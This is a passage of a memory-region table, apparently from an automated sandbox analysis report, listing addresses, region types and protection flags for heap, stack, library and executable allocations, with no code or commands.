32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
33D0000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
33BB000
|
heap
|
page read and write
|
||
|
21B43050000
|
trusted library allocation
|
page read and write
|
||
|
3B9D000
|
direct allocation
|
page execute and read and write
|
||
|
21CC000
|
stack
|
page read and write
|
||
|
2AAAA494000
|
heap
|
page read and write
|
||
|
1875DA30000
|
heap
|
page execute and read and write
|
||
|
1B5E53D0000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A851A7E000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1875C170000
|
heap
|
page read and write
|
||
|
21B3E31A000
|
heap
|
page read and write
|
||
|
2F48000
|
heap
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
671A000
|
unclassified section
|
page execute and read and write
|
||
|
2E00000
|
unkown
|
page readonly
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
1B5E56B0000
|
heap
|
page read and write
|
||
|
DE0000
|
unkown
|
page readonly
|
||
|
869F000
|
stack
|
page read and write
|
||
|
2AAA868D000
|
heap
|
page read and write
|
||
|
21B3EDC0000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAA8743000
|
heap
|
page read and write
|
||
|
21B42EFA000
|
heap
|
page read and write
|
||
|
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
544717C000
|
stack
|
page read and write
|
||
|
1875E362000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA4A6000
|
heap
|
page read and write
|
||
|
A851B7E000
|
unkown
|
page readonly
|
||
|
7F32000
|
heap
|
page read and write
|
||
|
AF0023E000
|
stack
|
page read and write
|
||
|
A851877000
|
stack
|
page read and write
|
||
|
1B5E7681000
|
trusted library allocation
|
page read and write
|
||
|
1875DF6B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA48F000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5E8B84000
|
trusted library allocation
|
page read and write
|
||
|
1F606957000
|
trusted library allocation
|
page read and write
|
||
|
21B3DA8F000
|
heap
|
page read and write
|
||
|
1875C083000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
C20000
|
unkown
|
page readonly
|
||
|
21B3D890000
|
heap
|
page read and write
|
||
|
2C1297E000
|
stack
|
page read and write
|
||
|
32E0000
|
direct allocation
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B3D870000
|
heap
|
page read and write
|
||
|
21B3DB13000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F60498B000
|
heap
|
page read and write
|
||
|
2AAAA4A6000
|
heap
|
page read and write
|
||
|
34A0000
|
heap
|
page read and write
|
||
|
21B42EF2000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1000000
|
unkown
|
page readonly
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
A85397E000
|
unkown
|
page readonly
|
||
|
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
|
7EC0000
|
heap
|
page read and write
|
||
|
7EE4000
|
heap
|
page read and write
|
||
|
2AAAA496000
|
heap
|
page read and write
|
||
|
21B42E42000
|
heap
|
page read and write
|
||
|
7F2B000
|
heap
|
page read and write
|
||
|
2AAAA495000
|
heap
|
page read and write
|
||
|
2AAA862A000
|
heap
|
page read and write
|
||
|
1B5FF4CC000
|
heap
|
page read and write
|
||
|
1F6048D0000
|
heap
|
page read and write
|
||
|
A85247E000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A852D7E000
|
stack
|
page read and write
|
||
|
376E000
|
stack
|
page read and write
|
||
|
1B5FF6D0000
|
heap
|
page read and write
|
||
|
A85227B000
|
stack
|
page read and write
|
||
|
21B3E740000
|
trusted library allocation
|
page read and write
|
||
|
1875BF60000
|
heap
|
page read and write
|
||
|
2AAAA491000
|
heap
|
page read and write
|
||
|
1F604940000
|
heap
|
page read and write
|
||
|
21B42E56000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
21B43051000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34520000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A85257E000
|
unkown
|
page readonly
|
||
|
2AAAA46F000
|
heap
|
page read and write
|
||
|
1875C070000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAA874A000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1810000
|
unkown
|
page readonly
|
||
|
21B3E840000
|
trusted library section
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5F74FB000
|
trusted library allocation
|
page read and write
|
||
|
890000
|
unkown
|
page readonly
|
||
|
2C12AFE000
|
stack
|
page read and write
|
||
|
1F61EA23000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5E56E6000
|
heap
|
page read and write
|
||
|
2C12EBE000
|
stack
|
page read and write
|
||
|
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
|
85BE000
|
stack
|
page read and write
|
||
|
1F606CE9000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
275000
|
unkown
|
page read and write
|
||
|
39A2000
|
direct allocation
|
page execute and read and write
|
||
|
1F604947000
|
heap
|
page read and write
|
||
|
1B5F72E3000
|
trusted library allocation
|
page read and write
|
||
|
1130000
|
unkown
|
page read and write
|
||
|
275000
|
unkown
|
page read and write
|
||
|
2EFF2000
|
system
|
page read and write
|
||
|
22C2000
|
unkown
|
page read and write
|
||
|
2AAAA404000
|
heap
|
page read and write
|
||
|
2AAA862A000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD346E2000
|
trusted library allocation
|
page read and write
|
||
|
A851C7C000
|
stack
|
page read and write
|
||
|
1875C1A0000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A852E7E000
|
unkown
|
page readonly
|
||
|
1B5E7492000
|
trusted library allocation
|
page read and write
|
||
|
1B5F8425000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA48F000
|
heap
|
page read and write
|
||
|
378D000
|
direct allocation
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
275000
|
unkown
|
page read and write
|
||
|
7EF7000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
669D000
|
stack
|
page read and write
|
||
|
7FFD346F2000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1875C0CF000
|
heap
|
page read and write
|
||
|
1B5FF72D000
|
heap
|
page read and write
|
||
|
21B3DA5D000
|
heap
|
page read and write
|
||
|
2AAA8745000
|
heap
|
page read and write
|
||
|
1F606950000
|
trusted library allocation
|
page read and write
|
||
|
2F53000
|
heap
|
page read and write
|
||
|
2AAAA494000
|
heap
|
page read and write
|
||
|
21B3E491000
|
trusted library allocation
|
page read and write
|
||
|
650000
|
unkown
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
277000
|
unkown
|
page readonly
|
||
|
A0000
|
unkown
|
page readonly
|
||
|
12A4000
|
heap
|
page read and write
|
||
|
12A000
|
stack
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
2F83000
|
heap
|
page read and write
|
||
|
300C000
|
heap
|
page read and write
|
||
|
20C4000
|
heap
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F6063A0000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD34510000
|
trusted library allocation
|
page read and write
|
||
|
1B5E72F0000
|
trusted library allocation
|
page read and write
|
||
|
21B3E202000
|
heap
|
page read and write
|
||
|
A8516FE000
|
stack
|
page read and write
|
||
|
2AAAA4A6000
|
heap
|
page read and write
|
||
|
2F42000
|
heap
|
page read and write
|
||
|
2AAAA499000
|
heap
|
page read and write
|
||
|
2AAAA473000
|
heap
|
page read and write
|
||
|
AF0053B000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A85307C000
|
stack
|
page read and write
|
||
|
1B5FF48C000
|
heap
|
page read and write
|
||
|
369D000
|
heap
|
page read and write
|
||
|
38D0000
|
direct allocation
|
page execute and read and write
|
||
|
357A000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
21B42EC1000
|
heap
|
page read and write
|
||
|
18776160000
|
heap
|
page read and write
|
||
|
3C20000
|
direct allocation
|
page read and write
|
||
|
AF0043E000
|
stack
|
page read and write
|
||
|
1F604A3B000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
18776070000
|
heap
|
page read and write
|
||
|
2AAAA41A000
|
heap
|
page read and write
|
||
|
3EE000
|
stack
|
page read and write
|
||
|
2AAAA422000
|
heap
|
page read and write
|
||
|
4D9E000
|
stack
|
page read and write
|
||
|
208C000
|
stack
|
page read and write
|
||
|
21B431F0000
|
remote allocation
|
page read and write
|
||
|
C20000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
|
1170000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32CB000
|
heap
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
129B000
|
heap
|
page read and write
|
||
|
21B42E4F000
|
heap
|
page read and write
|
||
|
277000
|
unkown
|
page readonly
|
||
|
2C1287E000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
544737C000
|
stack
|
page read and write
|
||
|
21B3DA00000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1875DE71000
|
trusted library allocation
|
page read and write
|
||
|
1875DAF0000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
DAC000
|
stack
|
page read and write
|
||
|
48A8000
|
unclassified section
|
page execute and read and write
|
||
|
1875DEF9000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
21B43080000
|
trusted library allocation
|
page read and write
|
||
|
21B3E300000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
D2C91FE000
|
stack
|
page read and write
|
||
|
7EFE000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3452D000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B3D9A0000
|
trusted library allocation
|
page read and write
|
||
|
1B5FF718000
|
heap
|
page read and write
|
||
|
2C128FF000
|
stack
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F604A35000
|
heap
|
page read and write
|
||
|
2D1F000
|
stack
|
page read and write
|
||
|
2AAAA412000
|
heap
|
page read and write
|
||
|
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
|
1B5E7795000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
|
1F6063A5000
|
heap
|
page read and write
|
||
|
17B6EFA0000
|
system
|
page execute and read and write
|
||
|
601000
|
unkown
|
page readonly
|
||
|
12A9000
|
unkown
|
page read and write
|
||
|
4074000
|
unclassified section
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
3C12000
|
direct allocation
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F606340000
|
heap
|
page readonly
|
||
|
AF0007E000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
18776016000
|
heap
|
page read and write
|
||
|
3656000
|
heap
|
page read and write
|
||
|
147F000
|
stack
|
page read and write
|
||
|
3360000
|
heap
|
page read and write
|
||
|
7FFD346B1000
|
trusted library allocation
|
page read and write
|
||
|
3610000
|
trusted library allocation
|
page read and write
|
||
|
7F35000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAAA54B000
|
heap
|
page read and write
|
||
|
1B5E5670000
|
trusted library allocation
|
page read and write
|
||
|
C40000
|
unkown
|
page readonly
|
||
|
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
|
1F60694D000
|
trusted library allocation
|
page read and write
|
||
|
2AAA8743000
|
heap
|
page read and write
|
||
|
1875C079000
|
heap
|
page read and write
|
||
|
2F20C000
|
system
|
page read and write
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
2984000
|
unkown
|
page read and write
|
||
|
7FFD34513000
|
trusted library allocation
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAA874A000
|
heap
|
page read and write
|
||
|
1F606841000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346D1000
|
trusted library allocation
|
page read and write
|
||
|
1B5FF272000
|
heap
|
page read and write
|
||
|
1B5F7280000
|
trusted library allocation
|
page read and write
|
||
|
1B5E5784000
|
heap
|
page read and write
|
||
|
2F4D000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7ED8000
|
heap
|
page read and write
|
||
|
3650000
|
heap
|
page read and write
|
||
|
22C000
|
stack
|
page read and write
|
||
|
2AAA862E000
|
heap
|
page read and write
|
||
|
A85177E000
|
unkown
|
page readonly
|
||
|
323C000
|
stack
|
page read and write
|
||
|
D2C8CFF000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
3856000
|
heap
|
page read and write
|
||
|
4A58000
|
system
|
page execute and read and write
|
||
|
2AAAA4A1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
630000
|
unkown
|
page readonly
|
||
|
7FFD34522000
|
trusted library allocation
|
page read and write
|
||
|
21B42EFC000
|
heap
|
page read and write
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
7FFD345B0000
|
trusted library allocation
|
page read and write
|
||
|
AF0033E000
|
stack
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
1B5E5510000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5E56A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
5446C7E000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
21B3E200000
|
heap
|
page read and write
|
||
|
54469BE000
|
stack
|
page read and write
|
||
|
4E9F000
|
stack
|
page read and write
|
||
|
1B5E55F6000
|
heap
|
page read and write
|
||
|
1B5FF493000
|
heap
|
page read and write
|
||
|
7FFD34512000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1875E333000
|
trusted library allocation
|
page read and write
|
||
|
1810000
|
unkown
|
page readonly
|
||
|
2FB1000
|
heap
|
page read and write
|
||
|
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
|
7ED2000
|
heap
|
page read and write
|
||
|
5446DFD000
|
stack
|
page read and write
|
||
|
1150000
|
unkown
|
page read and write
|
||
|
1141000
|
unkown
|
page readonly
|
||
|
2AAAA4A6000
|
heap
|
page read and write
|
||
|
3C90000
|
unclassified section
|
page execute and read and write
|
||
|
1B5E8BBF000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAA862E000
|
heap
|
page read and write
|
||
|
21B43130000
|
trusted library allocation
|
page read and write
|
||
|
1F61E99F000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1875C1D0000
|
heap
|
page read and write
|
||
|
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
|
33AF000
|
heap
|
page read and write
|
||
|
2E00000
|
unkown
|
page readonly
|
||
|
1F61E950000
|
heap
|
page read and write
|
||
|
1190000
|
heap
|
page read and write
|
||
|
21B43180000
|
trusted library allocation
|
page read and write
|
||
|
2C12DB8000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
1875DF78000
|
trusted library allocation
|
page read and write
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
84BE000
|
stack
|
page read and write
|
||
|
3931000
|
direct allocation
|
page execute and read and write
|
||
|
11DE000
|
stack
|
page read and write
|
||
|
1875DE88000
|
trusted library allocation
|
page read and write
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2F5A000
|
heap
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
21B3DAB0000
|
heap
|
page read and write
|
||
|
1B5E54D0000
|
heap
|
page read and write
|
||
|
2AAAA4A8000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5F788C000
|
trusted library allocation
|
page read and write
|
||
|
2FEA000
|
heap
|
page read and write
|
||
|
2AAAA577000
|
heap
|
page read and write
|
||
|
7F31000
|
heap
|
page read and write
|
||
|
7FFD345C6000
|
trusted library allocation
|
page read and write
|
||
|
2AAA8707000
|
heap
|
page read and write
|
||
|
5446D7E000
|
stack
|
page read and write
|
||
|
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
|
21B3DA9F000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
327E000
|
stack
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
2AAA86FE000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
26E000
|
unkown
|
page readonly
|
||
|
1B5E8927000
|
trusted library allocation
|
page read and write
|
||
|
AF000F8000
|
stack
|
page read and write
|
||
|
2FBE000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
7FFD34871000
|
trusted library allocation
|
page read and write
|
||
|
3560000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AAAA500000
|
heap
|
page read and write
|
||
|
1288000
|
heap
|
page read and write
|
||
|
2AAAA400000
|
heap
|
page read and write
|
||
|
1B5E7651000
|
trusted library allocation
|
page read and write
|
||
|
290000
|
unkown
|
page readonly
|
||
|
3570000
|
heap
|
page read and write
|
||
|
2AAA8711000
|
heap
|
page read and write
|
||
|
1F604983000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
C20000
|
unkown
|
page readonly
|
||
|
21B42E1F000
|
heap
|
page read and write
|
||
|
DAC000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAAA436000
|
heap
|
page read and write
|
||
|
2C12C3E000
|
stack
|
page read and write
|
||
|
26E000
|
unkown
|
page readonly
|
||
|
2AAA86CA000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
21B431A0000
|
trusted library allocation
|
page read and write
|
||
|
AF002B9000
|
stack
|
page read and write
|
||
|
6AF000
|
heap
|
page read and write
|
||
|
21B3DA13000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
21B3DAFF000
|
heap
|
page read and write
|
||
|
7FFD3451D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F61EA0C000
|
heap
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
88F000
|
stack
|
page read and write
|
||
|
1224000
|
heap
|
page read and write
|
||
|
7F25000
|
heap
|
page read and write
|
||
|
21B431B0000
|
trusted library allocation
|
page read and write
|
||
|
1875DECE000
|
trusted library allocation
|
page read and write
|
||
|
A852A7B000
|
stack
|
page read and write
|
||
|
2AAAA494000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
38C7000
|
heap
|
page read and write
|
||
|
261000
|
unkown
|
page execute read
|
||
|
7FFD34514000
|
trusted library allocation
|
page read and write
|
||
|
1B5E55B3000
|
heap
|
page read and write
|
||
|
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
|
21B42EC3000
|
heap
|
page read and write
|
||
|
18776018000
|
heap
|
page read and write
|
||
|
A85197E000
|
unkown
|
page readonly
|
||
|
1F604B60000
|
heap
|
page read and write
|
||
|
1F606350000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA417000
|
heap
|
page read and write
|
||
|
AF004BE000
|
stack
|
page read and write
|
||
|
A85207C000
|
stack
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7DF48DE10000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AAAA42F000
|
heap
|
page read and write
|
||
|
290000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F604B50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34524000
|
trusted library allocation
|
page read and write
|
||
|
20C0000
|
heap
|
page read and write
|
||
|
2AAAA44F000
|
heap
|
page read and write
|
||
|
A85317E000
|
unkown
|
page readonly
|
||
|
1B5F750D000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA0B0000
|
heap
|
page read and write
|
||
|
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA600000
|
heap
|
page read and write
|
||
|
1130000
|
unkown
|
page read and write
|
||
|
2AAAA48F000
|
heap
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
1875E46C000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA478000
|
heap
|
page read and write
|
||
|
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5FF410000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
11E0000
|
unkown
|
page read and write
|
||
|
1F61E9FC000
|
heap
|
page read and write
|
||
|
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
|
1F606320000
|
trusted library allocation
|
page read and write
|
||
|
2AAA8590000
|
heap
|
page read and write
|
||
|
2FCD000
|
heap
|
page read and write
|
||
|
3A6E000
|
direct allocation
|
page execute and read and write
|
||
|
21B42F00000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
54471FE000
|
stack
|
page read and write
|
||
|
21B3E31A000
|
heap
|
page read and write
|
||
|
21B3DA7D000
|
heap
|
page read and write
|
||
|
1F61ED50000
|
heap
|
page read and write
|
||
|
261000
|
unkown
|
page execute read
|
||
|
457A000
|
unkown
|
page execute and read and write
|
||
|
857F000
|
stack
|
page read and write
|
||
|
2FB1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAAA401000
|
heap
|
page read and write
|
||
|
1B5E5579000
|
heap
|
page read and write
|
||
|
1B5E8195000
|
trusted library allocation
|
page read and write
|
||
|
1150000
|
unkown
|
page read and write
|
||
|
5446933000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
12A000
|
stack
|
page read and write
|
||
|
1B5F836A000
|
trusted library allocation
|
page read and write
|
||
|
7F08000
|
heap
|
page read and write
|
||
|
A85337E000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAA8570000
|
heap
|
page read and write
|
||
|
33A5000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAAA483000
|
heap
|
page read and write
|
||
|
2AAAA467000
|
heap
|
page read and write
|
||
|
2F9D000
|
heap
|
page read and write
|
||
|
1F60699D000
|
trusted library allocation
|
page read and write
|
||
|
1B5FF491000
|
heap
|
page read and write
|
||
|
259C000
|
unkown
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
3007000
|
heap
|
page read and write
|
||
|
2C12FBC000
|
stack
|
page read and write
|
||
|
21B43080000
|
trusted library allocation
|
page read and write
|
||
|
33B0000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
601000
|
unkown
|
page readonly
|
||
|
1280000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
261000
|
unkown
|
page execute read
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
AF7FEFD000
|
stack
|
page read and write
|
||
|
21B3DA41000
|
heap
|
page read and write
|
||
|
698000
|
heap
|
page read and write
|
||
|
5446EFE000
|
stack
|
page read and write
|
||
|
259C000
|
unkown
|
page read and write
|
||
|
34B8000
|
heap
|
page read and write
|
||
|
AF00238000
|
stack
|
page read and write
|
||
|
1B5E8919000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
AF7FBCE000
|
stack
|
page read and write
|
||
|
7FFD346CA000
|
trusted library allocation
|
page read and write
|
||
|
1B5E8901000
|
trusted library allocation
|
page read and write
|
||
|
21B3DA78000
|
heap
|
page read and write
|
||
|
21B3E313000
|
heap
|
page read and write
|
||
|
21B3DA73000
|
heap
|
page read and write
|
||
|
21B3E890000
|
trusted library section
|
page readonly
|
||
|
AF7FF7F000
|
stack
|
page read and write
|
||
|
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
|
A852EFE000
|
stack
|
page read and write
|
||
|
C40000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
AF001B7000
|
stack
|
page read and write
|
||
|
A8527FE000
|
stack
|
page read and write
|
||
|
A851D7E000
|
unkown
|
page readonly
|
||
|
1B5FF400000
|
heap
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
30E4000
|
heap
|
page read and write
|
||
|
1F606863000
|
trusted library allocation
|
page read and write
|
||
|
2AAA86BC000
|
heap
|
page read and write
|
||
|
1B5E7655000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA501000
|
heap
|
page read and write
|
||
|
21D0000
|
unkown
|
page readonly
|
||
|
1875DF75000
|
trusted library allocation
|
page read and write
|
||
|
1F60497E000
|
heap
|
page read and write
|
||
|
21B42E5C000
|
heap
|
page read and write
|
||
|
1F60498D000
|
heap
|
page read and write
|
||
|
1B5E5680000
|
heap
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
21B42DC0000
|
trusted library allocation
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
1F604A32000
|
heap
|
page read and write
|
||
|
33EE000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A85129B000
|
stack
|
page read and write
|
||
|
AF7FFFF000
|
stack
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
4F7A000
|
unkown
|
page execute and read and write
|
||
|
5446E7E000
|
stack
|
page read and write
|
||
|
637A000
|
unkown
|
page execute and read and write
|
||
|
5447E4D000
|
stack
|
page read and write
|
||
|
4C5E000
|
stack
|
page read and write
|
||
|
21B42F0A000
|
heap
|
page read and write
|
||
|
3571000
|
heap
|
page read and write
|
||
|
610000
|
unkown
|
page read and write
|
||
|
4AD6000
|
system
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAA870A000
|
heap
|
page read and write
|
||
|
2AAAA43E000
|
heap
|
page read and write
|
||
|
7FFD345BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B5E5690000
|
heap
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
C20000
|
unkown
|
page readonly
|
||
|
7EC6000
|
heap
|
page read and write
|
||
|
2AAAA430000
|
heap
|
page read and write
|
||
|
2F99000
|
heap
|
page read and write
|
||
|
26E000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD346D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAAA601000
|
heap
|
page read and write
|
||
|
1B5E763C000
|
